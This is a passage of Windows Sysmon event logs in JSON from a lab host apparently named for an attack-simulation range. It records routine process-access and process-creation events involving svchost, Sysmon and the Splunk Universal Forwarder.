07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4028,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4029,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4030,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4031,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.319\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-203B-5F25-0000-0010E90E0600}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.319","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-203B-5F25-0000-0010E90E0600}","TargetProcessId":"4456","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4032,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.444\r\nSourceProcessGUID: {41C8662E-203B-5F25-0000-0010E90E0600}\r\nSourceProcessId: 4456\r\nSourceThreadId: 4544\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.444","SourceProcessGUID":"{41C8662E-203B-5F25-0000-0010E90E0600}","SourceProcessId":"4456","SourceThreadId":"4544","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4033,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.992\r\nProcessGuid: {41C8662E-203B-5F25-0000-0010AD100600}\r\nProcessId: 4552\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.992","ProcessGuid":"{41C8662E-203B-5F25-0000-0010AD100600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4034,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-203B-5F25-0000-0010AD100600}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-203B-5F25-0000-0010AD100600}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4035,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-203B-5F25-0000-0010AD100600}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-203B-5F25-0000-0010AD100600}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4036,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 